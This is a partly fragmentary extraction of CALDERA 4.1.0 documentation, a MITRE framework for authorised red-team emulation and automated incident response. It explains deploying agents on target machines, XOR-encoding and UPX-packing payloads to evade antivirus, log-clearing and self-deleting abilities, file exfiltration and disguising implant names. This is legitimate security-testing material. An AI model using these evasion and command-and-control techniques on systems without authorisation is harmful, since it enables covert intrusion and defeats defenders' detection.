Caldera Readthedocs Io en 4.1.0
Caldera Readthedocs Io en 4.1.0
1 Installing CALDERA 3
1.1 Requirements . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3
1.2 Installation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3
1.3 Docker Deployment . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
1.4 Offline Installation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
2 Getting started 7
2.1 Autonomous red-team engagements . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
2.2 Autonomous incident-response . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8
2.3 Manual red-team engagements . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9
2.4 Research on artificial intelligence . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
4 Basic Usage 13
4.1 Agents . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
4.2 Abilities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
4.3 Adversary Profiles . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18
4.4 Operations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18
4.5 Facts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19
4.6 Fact sources . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19
4.7 Rules . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20
4.8 Planners . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21
4.9 Plugins . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22
5 Server Configuration 23
5.1 Startup parameters . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
5.2 Configuration file . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
5.3 Custom configuration files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24
5.4 Enabling LDAP login . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
5.5 Setting Custom Login Handlers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
6 Plugin library 27
6.1 Sandcat . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27
6.2 Mock . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 29
6.3 Manx . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 29
6.4 Stockpile . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 30
i
6.5 Response . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 30
6.6 Compass . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 30
6.7 Caltack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 30
6.8 SSL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31
6.9 Atomic . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32
6.10 GameBoard . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32
6.11 Human . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32
6.12 Training . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
6.13 Access . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
6.14 Builder . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
6.15 Debrief . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 34
7 Parsers 35
7.1 Linking Parsers to an Ability . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
8 Relationships 39
8.1 Creating Relationships using Abilities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 39
8.2 Creating Relationships using CALDERA Server . . . . . . . . . . . . . . . . . . . . . . . . . . . . 40
9 Requirements 41
9.1 Example . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41
10 Objectives 43
10.1 Objectives . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43
10.2 Goals . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 44
11 Operation Results 45
11.1 Operation Report . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45
11.2 Operation Event Logs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 58
14 Dynamically-Compiled Payloads 73
14.1 Basic Example . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 73
14.2 Advanced Examples . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 74
15 Exfiltration 79
15.1 Exfiltrating Files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 79
15.2 Accessing Exfiltrated Files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 79
15.3 Accessing Operations Reports . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 80
15.4 Unencrypting the files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 80
17 C2 Communications Tunneling 87
17.1 SSH Tunneling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 87
ii
18 Uninstall CALDERA 91
19 Troubleshooting 93
19.1 Installing CALDERA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 93
19.2 Starting CALDERA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 93
19.3 Stopping CALDERA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 94
19.4 Agent Deployment . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 94
19.5 Operations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 94
19.6 Opening Files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 95
20 Resources 97
20.1 Ability List . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 97
20.2 Lateral Movement Video Tutorial . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 97
22 An Example 103
22.1 Pre-Work: GitHub . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 103
22.2 Operation Planning . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 103
22.3 Finding Content . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 104
22.4 Limiting our results . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 104
22.5 Staging . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 105
22.6 Final Piece: A Password . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 106
22.7 Operation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 107
23 Wrap-up 109
iii
27.3 A Minimal Planner . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 129
27.4 Advanced Fact Usage . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 130
27.5 Planning Service Utilities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 131
27.6 Operation Utilities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 131
27.7 Knowledge Service . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 132
29 app 139
29.1 app package . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 139
Index 217
iv
caldera
CALDERA™ is a cyber security framework designed to easily run autonomous breach-and-simulation exercises. It
can also be used to run manual red-team engagements or automated incident response. CALDERA is built on the
MITRE ATT&CK™ framework and is an active research project at MITRE.
The framework consists of two components:
1. The core system. This is the framework code, including an asynchronous command-and-control (C2) server with a
REST API and a web interface.
2. Plugins. These are separate repositories that hang off of the core framework, providing additional functionality.
Examples include agents, GUI interfaces, collections of TTPs and more.
Visit Installing CALDERA for installation information.
For getting familiar with the project, visit Getting started, which documents step-by-step guides for the most com-
mon use cases of CALDERA, and Basic usage, which documents how to use some of the basic components in core
CALDERA. Visit Learning the terminology for in depth definitions of the terms used throughout the project.
For information about CALDERA plugins, visit Plugin Library and How to Build Plugins if you are interested in
building your own.
USAGE GUIDES 1
caldera
2 USAGE GUIDES
CHAPTER
ONE
INSTALLING CALDERA
CALDERA can be installed in four commands using the concise installation instructions and, optionally, be installed
and run using a docker container.
1.1 Requirements
CALDERA aims to support a wide range of target systems, the core requirements are listed below:
• Linux or MacOS operating system
• Python 3.7, 3.8, or 3.9 (with pip3)
• A modern browser (Google Chrome is recommended)
• The packages listed in the requirements file
1.1.1 Recommended
To set up a development environment for CALDERA, and to dynamically compile agents, the following is recom-
mended:
• GoLang 1.17+ (for optimal agent functionality)
• Hardware: 8GB+ RAM and 2+ CPUs
• The packages listed in the dev requirements file
1.2 Installation
1.2.1 Concise
CALDERA can be installed quickly by executing the following 4 commands in your terminal.
3
caldera
Start by cloning the CALDERA repository recursively, pulling all available plugins. It is recommended to pass the
desired version/release (should be in x.x.x format). Cloning any non-release branch, including master, may result in
bugs.
In general, the git clone command takes the form:
Once the clone completes, we can jump in to the new caldera directory:
cd caldera
Finally, start the server (optionally with startup flags for additional logging):
python3 server.py
Once started, log in to http://localhost:8888 with the red using the password found in the conf/local.yml file (this
file will be generated on server start).
To learn how to use CALDERA, navigate to the Training plugin and complete the capture-the-flag style course.
Next, build the docker image, changing the image tag as desired.
cd caldera
docker build --build-arg WIN_BUILD=true . -t caldera:server
docker-compose build
Finally, run the docker CALDERA server, changing port forwarding as required. More information on CALDERA’s
configuration is available here.
It is possible to use pip to install CALDERA on a server without internet access. Dependencies will be downloaded to
a machine with internet access, then copied to the offline server and installed.
To minimize issues with this approach, the internet machine’s platform and Python version should match the offline
server. For example, if the offline server runs Python 3.8 on Ubuntu 20.04, then the machine with internet access should
run Python 3.8 and Ubuntu 20.04.
Run the following commands on the machine with internet access. These commands will clone the CALDERA repos-
itory recursively (passing the desired version/release in x.x.x format) and download the dependencies using pip:
The caldera directory now needs to be copied to the offline server (via scp, sneakernet, etc).
On the offline server, the dependencies can then be installed with pip3:
cd caldera
python3 server.py
TWO
GETTING STARTED
CALDERA, as a cybersecurity framework, can be used in several ways. For most users, it will be used to run either
offensive (red) or defensive (blue) operations.
Here are the most common use-cases and basic instructions on how to proceed.
This is the original CALDERA use-case. You can use the framework to build a specific threat (adversary) profile and
launch it in a network to see where you may be susceptible. This is good for testing defenses and training blue teams
on how to detect threats.
The following steps will walk through logging in, deploying an agent, selecting an adversary, and running an operation:
1) Log in as a red user. By default, a “red” user is creating with a password found in the conf/local.yml file (or
conf/default.yml if using insecure settings).
2) Deploy an agent
• Navigate to the Agents page and click the “Click here to deploy an agent”
• Choose the Sandcat agent and platform (victim operating system)
• Check that the value for app.contact.http matches the host and port the CALDERA server is listening
on
• Run the generated command on the victim machine. Note that some abilities will require elevated privileges,
which would require the agent to be deployed in an elevated shell.
• Ensure that a new agent appears in the table on the Agents page
3) Choose an adversary profile
• Navigate to the Adversaries page
• Select an adversary from the dropdown and review abilities. The “Discovery” and “Hunter” adversaries
from the Stockpile plugin are good starting profiles.
4) Run an operation
• Navigate to the Operations page and add an operation by toggling the View/Add switch
• Type in a name for the operation
• Under the basic options, select a group that contains the recently deployed agent (“red” by default)
• Under the basic options, select the adversary profile chosen in the last step
• Click the start button to begin the operation
7
caldera
CALDERA can be used to perform automated incident response through deployed agents. This is helpful for identifying
TTPs that other security tools may not see or block.
The following steps will walk through logging in to CALDERA blue, deploying a blue agent, selecting a defender, and
running an operation:
1) Log in as a blue user. By default, a “blue” user is creating with a password found in the conf/local.yml file
(or conf/default.yml if using insecure settings).
2) Deploy a blue agent
• Navigate to the Agents page and click the “Click here to deploy an agent”
• Choose the Sandcat agent and platform (victim operating system)
• Check that the value for app.contact.http matches the host and port the CALDERA server is listening
on
• Run the generated command on the victim machine. The blue agent should be deployed with elevated
privileges in most cases.
• Ensure that a new blue agent appears in the table on the Agents page
3) Choose a defender profile
• Navigate to the Defenders page
• Select a defender from the dropdown and review abilities. The “Incident responder” defender is a good
starting profile.
4) Choose a fact source. Defender profiles utilize fact sources to determine good vs. bad on a given host.
• Navigate to the Sources page
• Select a fact source and review facts. Consider adding facts to match the environment (for example, add a
fact with the remote.port.unauthorized name and a value of 8000 to detect services running on port
8000)
• Save the source if any changes were made
5) Run an operation
• Navigate to the Operations page and add an operation by toggling the View/Add switch
• Type in a name for the operation
• Under the basic options, select a group that contains the recently deployed agent (“blue” by default)
• Under the basic options, select the defender profile chosen previously
• Under the autonomous menu, select the fact source chosen previously
• Click the start button to begin the operation
6) Review the operation
• While the operation is running, abilities will be executed on the deployed agent. Click the stars next to run
abilities to view the output.
• Consider manually running commands (or using an automated adversary) which will trigger incident re-
sponse actions (such as starting a service on an unauthorized port)
7) Export operation results
• Once the operation finishes, users can export operation reports in JSON format by clicking the “Download
report” button in the operation GUI modal. Users can also export operation event logs in JSON format by
clicking the “Download event logs” button in the operations modal. The event logs will also be automati-
cally written to disk when the operation finishes. For more information on the various export formats and
automatic/manual event log generation, see the Operation Result page.
CALDERA can be used to perform manual red-team assessments using the Manx agent. This is good for replacing or
appending existing offensive toolsets in a manual assessment, as the framework can be extended with any custom tools
you may have.
The following steps will walk through logging in, deploying a Manx agent, and running manual commands:
1) Log in as a red user
2) Deploy a Manx agent
• Navigate to the Agents page and click the “Click here to deploy an agent”
• Choose the Manx agent and platform (victim operating system)
• Check that the values for app.contact.http, app.contact.tcp, and app.contact.udp match the
host and ports the CALDERA server is listening on
• Run the generated command on the victim machine
• Ensure that a new agent appears in the table on the Agents page
3) Deploy a Manx agent
• Navigate to the Manx plugin
• Select the deployed agent in the session dropdown
• Run manual commands in the terminal window
CALDERA can be used to test artificial intelligence and other decision-making algorithms using the Mock plugin. The
plugin adds simulated agents and mock ability responses, which can be used to run simulate an entire operation.
To use the mock plugin:
1) With the server stopped, enable the mock plugin. Restart the server.
2) Log in as a red user
3) In the Agents modal, review the simulated agents that have been spun up
4) Run an operation using any adversary against your simulated agents. Note how the operation runs non-
deterministically.
5) Adjust the decision logic in a planner, such as the batch.py planner in the Stockpile plugin, to test out different
theories
THREE
3.1 Agents
Agents are software programs that connect back to CALDERA at certain intervals to get instructions. Agents commu-
nicate with the CALDERA server via a contact method, initially defined at agent install.
Installed agents appear in the UI in the Agents dialog. Agents are identified by their unique paw - or paw print.
CALDERA includes a number of agent programs, each adding unique functionality. A few examples are listed below:
• Sandcat: A GoLang agent which can communicate through various C2 channels, such as HTTP, Github GIST,
or DNS tunneling.
• Manx: A GoLang agent which communicates via the TCP contact and functions as a reverse-shell
• Ragdoll: A Python agent which communicates via the HTML contact
Agents can be placed into a group, either at install through command line flags or by editing the agent in the UI. These
groups are used when running an operation to determine which agents to execute abilities on.
The group determines whether an agent is a “red agent” or a “blue agent”. Any agent started in the “blue” group will
be accessible from the blue dashboard. All other agents will be accessible from the red dashboard.
An ability is a specific ATT&CK tactic/technique implementation which can be executed on running agents. Abilities
will include the command(s) to run, the platforms / executors the commands can run on (ex: Windows / PowerShell),
payloads to include, and a reference to a module to parse the output on the CALDERA server.
Adversary profiles are groups of abilities, representing the tactics, techniques, and procedures (TTPs) available to a
threat actor. Adversary profiles are used when running an operation to determine which abilities will be executed.
3.3 Operations
Operations run abilities on agent groups. Adversary profiles are used to determine which abilities will be run and agent
groups are used to determine which agents the abilities will be run on.
The order in which abilities are run is determined by the planner. A few examples of planners included, by default, in
CALDERA are listed below:
• atomic: Run abilities in the adversary profile according to the adversary’s atomic ordering
• batch: Run all abilities in the adversary profile at once
11
caldera
3.4 Plugins
CALDERA is a framework extended by plugins. These plugins provide CALDERA with extra functionality in some
way.
Multiple plugins are included by default in CALDERA. A few noteworthy examples are below, though a more complete
and detailed list can be found on the Plugin Library page:
• Sandcat: The Sandcat agent is the recommended agent for new users
• Stockpile: This plugin holds the majority of open-source abilities, adversaries, planners, and obfuscators created
by the CALDERA team
• Training: The training plugin walks users through most of CALDERA’s functionality – recommended for new
users
FOUR
BASIC USAGE
4.1 Agents
To deploy an agent:
1. Navigate to the Agents module in the side menu under “Campaigns” and click the “Deploy an agent” button
2. Choose an agent (Sandcat is a good one to start with) and a platform (target operating system)
3. Make sure the agent options are correct (e.g. ensure app.contact.http matches the expected host and port for
the CALDERA server)
• app.contact.http represents the HTTP endpoint (including the IP/hostname and port) that the C2 server
is listening on for agent requests and beacons. Examples: http://localhost:8888, https://10.1.2.
3, http://myc2domain.com:8080
• agents.implant_name represents the base name of the agent binary. For Windows agents, .exe will be
automatically appended to the base name (e.g. splunkd will become splunkd.exe).
• agent.extensions takes in a comma-separated list of agent extensions to compile with your agent binary.
When selecting the associated deployment command, this will instruct the C2 server to compile the agent
binary with the requested extensions, if they exist. If you just want a basic agent without extensions, leave
this field blank. See Sandcat extension documentation for more information on Sandcat extensions.
4. Choose a command to execute on the target machine. If you want your agent to be compiled with the extensions
from agent.extensions, you must select the associated deployment command below: Compile red-team
agent with a comma-separated list of extensions (requires GoLang).
5. On the target machine, paste the command into the terminal or PowerShell window and execute it
6. The new agent should appear in the table in the Agents tab (if the agent does not appear, check the Agent Deploy-
ment section of the Troubleshooting page)
To kill an agent, use the “Kill Agent” button under the agent-specific settings. The agent will terminate on its next
beacon.
To remove the agent from CALDERA (will not kill the agent), click the red X. Running agents remove from CALDERA
will reappear when they check in.
13
caldera
4.2 Abilities
The majority of abilities are stored inside the Stockpile plugin (plugins/stockpile/data/abilities), along the
adversary profiles which use them. Abilities created through the UI will be placed in data/abilities.
Here is a sample ability:
- id: 9a30740d-3aa8-4c23-8efa-d51215e8a5b9
name: Scan WIFI networks
description: View all potential WIFI networks on host
tactic: discovery
technique:
attack_id: T1016
name: System Network Configuration Discovery
platforms:
darwin:
sh:
command: |
./wifi.sh scan
payload: wifi.sh
linux:
sh:
command: |
./wifi.sh scan
payload: wifi.sh
(continues on next page)
Things to note:
• Each ability has a random UUID id
• Each ability requires a name, description, ATT&CK tactic and technique information
• Each ability requires a platforms list, which should contain at least 1 block for a supported operating system
(platform). Currently, abilities can be created for Windows, Linux, and Darwin (MacOS).
• Abilities can be added to an adversary through the GUI with the ‘add ability’ button
• The delete_payload field (optional, placed at the top level, expects True or False) specifies whether the agent
should remove the payload from the filesystem after the ability completes. The default value, if not provided, is
True.
• The singleton field (optional, placed at the top level, expects True or False) specifies that the ability should only
be run successfully once - after it succeeds, it should not be run again in the same operation. The default value,
if not provided, is False.
• The repeatable field (optional, placed at the top level, expects True or False) specifies that the ability can be
repeated as many times as the planner desires. The default value, if not provided, is False.
Please note that only one of singleton or repeatable should be True at any one time - singleton operates at an operational
level, and repeatable at an agent level. If both are true at the same time, Caldera may behave unexpected.
For each platform, there should be a list of executors. In the default Sandcat deployment, Darwin and Linux platforms
can use sh and Windows can use psh (PowerShell) or cmd (command prompt).
Each platform block consists of a:
• command (required)
• payload (optional)
• uploads (optional)
• cleanup (optional)
• parsers (optional)
• requirements (optional)
• timeout (optional)
Command: A command can be 1-line or many and should contain the code you would like the ability to execute.
Newlines in the command will be deleted before execution. The command can (optionally) contain variables, which
are identified as #{variable}.
Prior to execution of a command, CALDERA will search for variables within the command and attempt to replace
them with values. The values used for substitution depend on the type of the variable in the command: user-defined or
global variable. User-defined variables are associated with facts can be filled in with fact values from fact sources or
parser output, while global variables are filled in by CALDERA internally and cannot be substituted with fact values.
The following global variables are defined within CALDERA:
4.2. Abilities 15
caldera
• #{server} references the FQDN of the CALDERA server itself. Because every agent may know the location of
CALDERA differently, using the #{server} variable allows you to let the system determine the correct location
of the server.
• #{group} is the group a particular agent is a part of. This variable is mainly useful for lateral movement, where
your command can start an agent within the context of the agent starting it.
• #{paw} is the unique identifier - or paw print - of the agent.
• #{location} is the location of the agent on the client file system.
• #{exe_name} is the executable name of the agent.
• #{upstream_dest} is the address of the immediate “next hop” that the agent uses to reach the CALDERA
server. For agents that directly connect to the server, this will be the same as the #{server} value. For agents
that use peer-to-peer, this value will be the peer address used.
• #{origin_link_id} is the internal link ID associated with running this command used for agent tracking.
• #{payload} and #{payload:<uuid>} are used primarily in cleanup commands to denote a payload file down-
loaded by an agent.
• #{app.*} are configuration items found in your main CALDERA configuration (e.g., conf/default.yml)
with a prefix of app.. Variables starting with app. that are not found in the CALDERA configuration are not
treated as global variables and can be subject to fact substitution.
Payload: A comma-separated list of files which the ability requires in order to run. In the windows executor above, the
payload is wifi.ps1. This means, before the ability is used, the agent will download wifi.ps1 from CALDERA. If the
file already exists, it will not download it. You can store any type of file in the payload directories of any plugin.
Did you know that you can assign functions to execute on the server when specific payloads are requested
for download? An example of this is the sandcat.go file. Check the plugins/sandcat/hook.py file to see
how special payloads can be handled.
Payloads can be stored as regular files or you can xor (encode) them so the anti-virus on the server-side does not pick
them up. To do this, run the app/utility/payload_encoder.py against the file to create an encoded version of it. Then
store and reference the encoded payload instead of the original.
The payload_encoder.py file has a docstring which explains how to use the utility.
Payloads also can be ran through a packer to obfuscate them further from detection on a host machine. To do this you
would put the packer module name in front of the filename followed by a colon ‘:’. This non-filename character will
be passed in the agent’s call to the download endpoint, and the file will be packed before sending it back to the agent.
UPX is currently the only supported packer, but adding addition packers is a simple task.
An example for setting up for a packer to be used would be editing the filename in the payload section of
an ability file: - upx:Akagi64.exe
Uploads: A list of files which the agent will upload to the C2 server after running the ability command. The filepaths
can be specified as local file paths or absolute paths. The ability assumes that these files will exist during the time of
upload.
Below is an example ability that uses the uploads keyword:
---
- id: 22b9a90a-50c6-4f6a-a1a4-f13cb42a26fd
name: Upload file example
description: Example ability to upload files
tactic: exfiltration
technique:
(continues on next page)
Cleanup: An instruction that will reverse the result of the command. This is intended to put the computer back into the
state it was before the ability was used. For example, if your command creates a file, you can use the cleanup to remove
the file. Cleanup commands run after an operation, in the reverse order they were created. Cleaning up an operation is
also optional, which means you can start an operation and instruct it to skip all cleanup instructions.
Cleanup is not needed for abilities, like above, which download files through the payload block. Upon an operation
completing, all payload files will be removed from the client (agent) computers.
Parsers: A list of parsing modules which can parse the output of the command into new facts. Interested in this topic?
Check out how CALDERA parses facts, which goes into detail about parsers.
Abilities can also make use of two CALDERA REST API endpoints, file upload and download.
Requirements: Required relationships of facts that need to be established before this ability can be used. See Require-
ments for more information.
Timeout: How many seconds to allow the command to run.
Bootstrap Abilities are abilities that run immediately after sending their first beacon in. A bootstrap ability can be
added through the GUI by entering the ability id into the ‘Bootstrap Abilities’ field in the ‘Agents’ tab. Alternatively,
you can edit the conf/agents.yml file and include the ability id in the bootstrap ability section of the file (ensure the
server is turned off before editing any configuration files).
Deadman Abilities are abilities that an agent runs just before graceful termination. When the Caldera server receives an
initial beacon from an agent that supports deadman abilities, the server will immediately send the configured deadman
abilities, along with any configured bootstrap abilities, to the agent. The agent will save the deadman abilities and
execute them if terminated via the GUI or if self-terminating due to watchdog timer expiration or disconnection from
the C2. Deadman abilities can be added through the GUI by entering a comma-separated list of ability IDs into the
‘Deadman Abilities’ field in the ‘Agents’ tab. Alternatively, you can edit the ‘conf/agents.yml’ file and include the
ability ID in the ‘deadman_abilities’ section of the file (ensure the server is turned off before editing any configuration
files).
Below is an example conf/agents.yml file with configured bootstrap and deadman abilities:
bootstrap_abilities:
- 43b3754c-def4-4699-a673-1d85648fda6a # Clear and avoid logs
deadman_abilities:
- 5f844ac9-5f24-4196-a70d-17f0bd44a934 # delete agent executable upon termination
implant_name: splunkd
(continues on next page)
4.2. Abilities 17
caldera
The majority of adversary profiles are stored inside the Stockpile plugin (plugins/stockpile/data/adversaries).
Adversary profiles created through the UI will be placed in data/adversaries.
Adversaries consist of an objective (optional) and a list of abilities under atomic_ordering. This ordering determines
the order in which abilities will be run.
An example adversary is below:
id: 5d3e170e-f1b8-49f9-9ee1-c51605552a08
name: Collection
description: A collection adversary
objective: 495a9828-cab1-44dd-a0ca-66e58177d8cc
atomic_ordering:
- 1f7ff232-ebf8-42bf-a3c4-657855794cfe #find company emails
- d69e8660-62c9-431e-87eb-8cf6bd4e35cf #find ip addresses
- 90c2efaa-8205-480d-8bb6-61d90dbaf81b #find sensitive files
- 6469befa-748a-4b9c-a96d-f191fde47d89 #create staging dir
4.4 Operations
• Jitter: Agents normally check in with CALDERA every 60 seconds. Once they realize they are part of an active
operation, agents will start checking in according to the jitter time, which is by default 2/8. This fraction tells the
agents that they should pause between 2 and 8 seconds (picked at random each time an agent checks in) before
using the next ability.
• Visibility: How visible should the operation be to the defense. Defaults to 51 because each ability defaults to a
visibility of 50. Abilities with a higher visibility than the operation visibility will be skipped.
After starting an operation, users can export the operation report in JSON format by clicking the “Download report”
button in the operation GUI modal. For more information on the operation report format, see the Operation Result
section.
4.5 Facts
A fact is an identifiable piece of information about a given computer. Facts can be used to perform variable assignment
within abilities.
Facts are composed of the following:
• name: a descriptor which identifies the type of the fact and can be used for variable names within abilities.
Example: host.user.name. Note that CALDERA 3.1.0 and earlier required fact names/traits to be formatted
as major.minor.specific but this is no longer a requirement.
• value: any arbitrary string. An appropriate value for a host.user.name may be “Administrator” or “John”.
• score: an integer which associates a relative importance for the fact. Every fact, by default, gets a score of 1. If
a host.user.password fact is important or has a high chance of success if used, you may assign it a score of
5. When an ability uses a fact to fill in a variable, it will use those with the highest scores first. If a fact has a
score of 0, it will be blocklisted - meaning it cannot be used in the operation.
If a property has a prefix of host. (e.g., host.user.name) that fact will only be used by the host that
collected it.
As hinted above, when CALDERA runs abilities, it scans the command and cleanup instructions for variables. When
it finds one, it then looks at the facts it has and sees if it can replace the variables with matching facts (based on the
property). It will then create new variants of each command/cleanup instruction for each possible combination of facts
it has collected. Each variant will be scored based on the cumulative score of all facts inside the command. The highest
scored variants will be executed first.
Facts can be added or modified through the GUI by navigating to Advanced -> Sources and clicking on ‘+ add row’.
A fact source is a collection of facts that you have grouped together. A fact source can be applied to an operation when
you start it, which gives the operation facts to fill in variables with.
Fact sources can be added or modified through the GUI by navigating to Advanced -> Sources.
4.5. Facts 19
caldera
4.7 Rules
A rule is a way of restricting or placing boundaries on CALDERA. Rules are directly related to facts and should be
included in a fact sheet.
Rules act similar to firewall rules and have three key components: fact, action, and match
1. Fact specifies the name of the fact that the rule will apply to
2. Action (ALLOW, DENY) will allow or deny the fact from use if it matches the rule
3. Match regex rule on a fact’s value to determine if the rule applies
During an operation, the planning service matches each link against the rule-set, discarding it if any of the fact assign-
ments in the link match a rule specifying DENY and keeping it otherwise. In the case that multiple rules match the
same fact assignment, the last one listed will be given priority.
Example
rules:
- action: DENY
fact: file.sensitive.extension
match: .*
- action: ALLOW
fact: file.sensitive.extension
match: txt
In this example only the txt file extension will be used. Note that the ALLOW action for txt supersedes the DENY for
all, as the ALLOW rule is listed later in the policy. If the ALLOW rule was listed first, and the DENY rule second,
then all values (including txt) for file.sensitive.extension would be discarded.
4.7.1 Subnets
- action: DENY
fact: my.host.ip
match: .*
- action: ALLOW
fact: my.host.ip
match: 10.245.112.0/24
In this example, the rules would permit CALDERA to only operate within the 10.245.112.1 to 10.245.112.254 range.
Rules can be added or modified through the GUI by navigating to Advanced -> Sources and clicking on ‘+ view rules’.
Fact source adjustments allow for dynamic adjustment specific ability’s visibility in the context of an operation.
Adjustment Example (basic fact source)
adjustments:
1b4fb81c-8090-426c-93ab-0a633e7a16a7:
host.installed.av:
- value: symantec
offset: 3
- value: mcafee
offset: 3
In this example, if in the process of executing an operation, a host.installed.av fact was found with either the
value symantec or mcafee, ability 1b4fb81c-8090-426c-93ab-0a633e7a16a7 (Sniff network traffic) would have
its visibility score raised and the status HIGH_VIZ. This framework allows dynamic adjustments to expected ability
visibility based on captured facts (in this example the presence of anti-virus software on the target) which may impact
our desire to run the ability, as it might be more easily detected in this environment.
When the “Sniff network traffic” ability is run, its visibility is only adjusted if, at the time of execution, the fact source
has a host.installed.av fact with either the value symantec or mcafee. If one or both of these facts are present,
each execution of “Sniff network traffic” will have 3 (the value of it’s offset) added to its visibility score. This
visibility adjustment is recorded in the operation report.
Adjustments must be added or modified through the fact source’s .yml file, with the exception of new fact sources
created using the REST API’s sources endpoint with a well-formed PUT request.
4.8 Planners
A planner is a module within CALDERA which contains logic for how a running operation should make decisions
about which abilities to use and in what order.
